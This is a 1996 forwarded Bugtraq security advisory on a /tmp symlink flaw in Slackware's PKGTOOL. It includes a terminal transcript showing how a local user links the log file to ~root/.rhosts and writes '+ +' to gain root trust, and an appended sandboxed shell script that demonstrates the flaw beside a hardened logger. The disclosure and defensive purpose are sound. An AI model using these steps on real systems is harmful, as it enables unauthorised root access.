From proff  Tue Sep 17 18:19:59 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id SAA00826 for best-of-security; Tue, 17 Sep 1996 18:19:59 +1000
From: Julian Assange <proff>
Message-Id: <199609170819.SAA00826@suburbia.net>
Subject: [linux-security] [BUG] Vulnerability in PKGTOOL (fwd)
To: best-of-security
Date: Tue, 17 Sep 1996 18:19:58 +1000 (EST)
Approved: proff@suburbia.net
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text

Forwarded message:
From best-of-security-request@suburbia.net  Tue Sep 17 17:54:15 1996
X-Envelope-From: slogic@lightning.netcore.com.au  Tue Sep 17 17:54:13 1996
From: Tech-Manip <slogic@lightning.netcore.com.au>
Message-Id: <199609171926.PAA11297@lightning.netcore.com.au>
Subject: [linux-security] [BUG] Vulnerability in PKGTOOL (fwd)
To: best-of-security@suburbia.net
Date: Tue, 17 Sep 1996 15:26:07 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Forwarded message:
From owner-linux-security@tarsier.cv.nrao.edu Tue Sep 17 15:15:05 1996
Resent-Date: Mon, 16 Sep 1996 12:29:58 -0400
Resent-From: Jeff Uphoff <juphoff@tarsier.cv.nrao.edu>
Resent-Message-Id: <199609161629.MAA08571@tarsier.cv.nrao.edu>
Resent-To: linux-security@tarsier.cv.nrao.edu
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.95.960826211956.738A-100000@litterbox.org>
X-cc:         New Hack City Projects <project@newhackcity.net>,
              "(d)(M)(v)" <dmv@shore.net>, Raven <raven@raven.cybercom.net>,
              Bill Arcand <bill@demtech.com>
From: "Sean B. Hamor" <hamors@litterbox.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Subject: [linux-security] [BUG] Vulnerability in PKGTOOL
Date: 	Mon, 26 Aug 1996 21:22:49 -0400
X-Mailer: VM 5.95 (beta); GNU Emacs 19.29.1
X-Attribution: Up
Sender: owner-linux-security@tarsier.cv.nrao.edu
Precedence: list

[Mod: Forwarded from Bugtraq.  --Jeff.]

-----BEGIN PGP SIGNED MESSAGE-----


                                                       Monday, August 26, 1996
                                                                 The Litterbox
                                                                 Sean B. Hamor
                                                                       PKGTOOL

Note:

  I'm not sure whether or not this information has been previously released.
  I found this earlier this evening while poking around, and apologize if
  I've just found an old bug.

  I verified the existence of this bug in PKGTOOL for Linux Slackware 3.0.
  My assumption would be that most other Linux distributions are affected as
  well.


Synopsis:

  A problem exists in the way PKGTOOL handles the /tmp/PKGTOOL.REMOVED
  logfile.  This logfile is created mode 666, which allows any user to write
  to it.  Although this file is usually created the first time PKGTOOL is
  run and can't be removed by normal users, a problem develops if root or
  the owner of the logfile deletes it for some reason or if PKGTOOL has
  never been run before.


Exploit:

  If /tmp/PKGTOOL.REMOVED gets deleted or hasn't been created yet, any user
  can now create a symbolic link from /tmp/PKGTOOL.REMOVED to ~root/.rhosts
  (for a generic example).  The next time PKGTOOL is run, which will more
  than likely be run by root, ~root/.rhosts will be created as a 666 file
  with the logs from PKGTOOL as its contents.  One may now simply do an echo
  "+ +" > /tmp/PKGTOOL.REMOVED, then rm /tmp/PKGTOOL.REMOVED.

  For this example, root is the victim while hamors is the attacker:

hamors (2 20:57) litterbox:/tmp> ls -al | grep PKG
-rw-rw-rw-   1 root     root        16584 Aug 26 18:07 PKGTOOL.REMOVED.backup

hamors (3 21:00) litterbox:/tmp> ln -s ~root/.rhosts PKGTOOL.REMOVED

hamors (4 20:58) litterbox:/tmp> cat PKGTOOL.REMOVED
cat: PKGTOOL.REMOVED: No such file or directory

God (17 20:59) litterbox:~# pkgtool
  root now uses PKGTOOL to delete a package

hamors (5 DING!) litterbox:/tmp> head PKGTOOL.REMOVED
Removing package tcl:
Removing files:
  ...

hamors (6 21:00) litterbox:/tmp> echo "+ +" > PKGTOOL.REMOVED

hamors (7 21:00) litterbox:/tmp> cat ~root/.rhosts
+ +


Verification:

This vulnerability has been tested on Linux Slackware 3.0 with the stock
installed PKGTOOL.

EOF

Finger hamors@ishiboo.com           /\_/\          mailto:hamors@litterbox.org
for PGP public key block.          ( o.o )     http://www.ishiboo.com/~hamors/
alt.litterbox, The Home of TOCA     > ^ <    http://www.litterbox.org/~hamors/
 Hi!  I'm a .signature virus!  Add me to your .signature and join in the fun!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMiJN7zU6HlxZIJ+FAQE7NAf9E5P4vobbqztG9U/dlV85EveNOm0y5g8y
YP+2IAgOp4kV1CPrNYgVPNLu06xwycrI/fYyF5EZNOvL/UEYYp+OvpRXk23Z7du9
6nQ7rzF7yPoo+mL5nauXTNQArRvYTHktXQejgApKQNr7XdzwRGL64Q/Y0NH+C9P+
AtxehPQk+7dXWMOX2jeFwkX11DQ9urU/SEWvoJEuv2qV4/aaIHBLrEGs4xkxHPzk
xtPKJGb05qIoZ6kuibLnfE6rElIYbaDbYmXhX7hnzymPa8gPJv/J0UHuXBg0Qj2o
D8+FeJC6ZMJL9V6/ERw4BfcaYwO5TGuVm5+Ui/9g1OZ9xrXppxNt9Q==
=Ujhw
-----END PGP SIGNATURE-----
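The pattern in the advisory, reproduced as an added shell example; this is not
code from the original post or from Slackware's pkgtool. It runs unprivileged
inside a scratch directory that stands in for /tmp, and the file named
root_rhosts is a constructed stand-in for ~root/.rhosts, so nothing outside the
scratch directory is touched. Beside the vulnerable logger it shows a hardened
one that refuses a log path in a directory other users can write to, or one
that is already a symlink, and creates the log 0600.

```shell
#!/bin/sh
# Added example, not code from the advisory or from Slackware's pkgtool.
# Everything runs unprivileged inside a scratch directory that stands in
# for /tmp, so no real ~root/.rhosts is touched; the file names below are
# constructed for the demonstration.
set -u

SANDBOX=$(mktemp -d)                # stands in for /tmp
VICTIM="$SANDBOX/root_rhosts"       # stands in for ~root/.rhosts
LOG="$SANDBOX/PKGTOOL.REMOVED"      # the predictable log path from the advisory
cleanup() { rm -rf "$SANDBOX"; }
trap cleanup EXIT

# Vulnerable pattern: open a fixed, predictable path in a shared directory
# with '>>' and a permissive umask. open(2) follows a symlink there, so the
# writer creates/appends to whatever the link points at, with mode 0666.
vulnerable_log() {
    ( umask 000; printf '%s\n' "$1" >> "$LOG" )
}

# Reproduce the advisory: attacker plants the link, "root" logs a removal,
# attacker overwrites through the same link. Prints the victim's contents.
reproduce() {
    rm -f "$LOG" "$VICTIM"
    ln -s "$VICTIM" "$LOG"                  # attacker: ln -s ~root/.rhosts PKGTOOL.REMOVED
    vulnerable_log "Removing package tcl:"  # root: pkgtool writes its log
    echo "+ +" > "$LOG"                     # attacker: echo "+ +" > PKGTOOL.REMOVED
    rm -f "$LOG"                            # attacker: rm PKGTOOL.REMOVED (removes the link only)
    cat "$VICTIM"
}

# Mode string of the victim after reproduce(), e.g. -rw-rw-rw-
victim_mode() {
    ls -ld "$VICTIM" | cut -c1-10
}

# Is 'other' allowed to write in this directory? (char 9 of the mode string)
dir_writable_by_others() {
    case "$(ls -ld "$1" | cut -c9)" in
        w) return 0 ;;
        *) return 1 ;;
    esac
}

# Hardened logger. The real fix is structural: never log to a predictable
# name in a directory other users can write to. The symlink and
# regular-file checks below are defence in depth only; they still race
# against an attacker who swaps the path between the test and the open.
safe_log() {
    dir=$(dirname "$LOG")
    if dir_writable_by_others "$dir"; then
        echo "refusing: $dir is writable by other users" >&2; return 1
    fi
    if [ -L "$LOG" ]; then
        echo "refusing: $LOG is a symlink" >&2; return 1
    fi
    if [ -e "$LOG" ] && [ ! -f "$LOG" ]; then
        echo "refusing: $LOG is not a regular file" >&2; return 1
    fi
    ( umask 077; printf '%s\n' "$1" >> "$LOG" )   # created 0600 if new
}

# Same attack against safe_log: prints "blocked" if the victim was never
# created, "compromised" otherwise.
reproduce_hardened() {
    rm -f "$LOG" "$VICTIM"
    ln -s "$VICTIM" "$LOG"
    safe_log "Removing package tcl:" 2>/dev/null || true
    if [ -e "$VICTIM" ]; then echo compromised; else echo blocked; fi
}

# Normal run of safe_log with no link in place: prints the log's mode string.
hardened_clean_run() {
    rm -f "$LOG" "$VICTIM"
    safe_log "Removing package tcl:"
    ls -ld "$LOG" | cut -c1-10
}

echo "vulnerable: victim now contains '$(reproduce)' with mode $(victim_mode)"
echo "hardened:   attack $(reproduce_hardened); clean log created $(hardened_clean_run)"
```

Against a real /tmp the hardened logger refuses before the symlink test is
even reached, because the directory is writable by everyone; that is the
check that actually closes the hole, and it points at the proper fix of
keeping the log under a root-owned directory rather than /tmp. The scratch
directory is created 0700, so here the symlink check is what fires. On
Linux 3.6 and later the fs.protected_symlinks sysctl also stops root from
following a symlink in a world-writable sticky directory when the link is
owned by someone else; the example sidesteps it by having attacker and
victim be the same unprivileged user.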


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies.  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for our own good will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+

